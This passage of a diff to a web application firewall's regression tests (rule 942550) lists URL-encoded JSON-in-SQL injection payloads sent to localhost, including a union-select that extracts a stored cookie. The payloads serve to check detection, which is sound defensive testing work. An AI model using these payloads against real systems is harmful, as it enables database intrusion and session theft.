text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 7 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 8 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 9 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 10 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 11 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 12 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 13 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 14 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 15 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 16 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 17 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 18 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 19 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 20 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 21 desc: | JSON in SQL (ARGS) decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 22 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 23 desc: | JSON in SQL (ARGS) decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 24 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 25 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":"b"}' ? 'a' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 26 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":"b"}' ? 'a' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 27 desc: | JSON in SQL (ARGS) decoded payload: OR '[1,2]' ? '1' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 28 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '[1,2]' ? '1' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 29 desc: | JSON in SQL (ARGS) decoded payload: OR '{"name":"asd"}' ?| array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 30 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"name":"asd"}' ?| array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 31 desc: | JSON in SQL (ARGS) decoded payload: OR '{"name":"asd"}' ?& array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 32 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"name":"asd"}' ?& array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 33 desc: | JSON in SQL (ARGS) decoded payload: OR '[1,2,3]'::json ->> 2='3' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-34 + - input: + dest_addr: 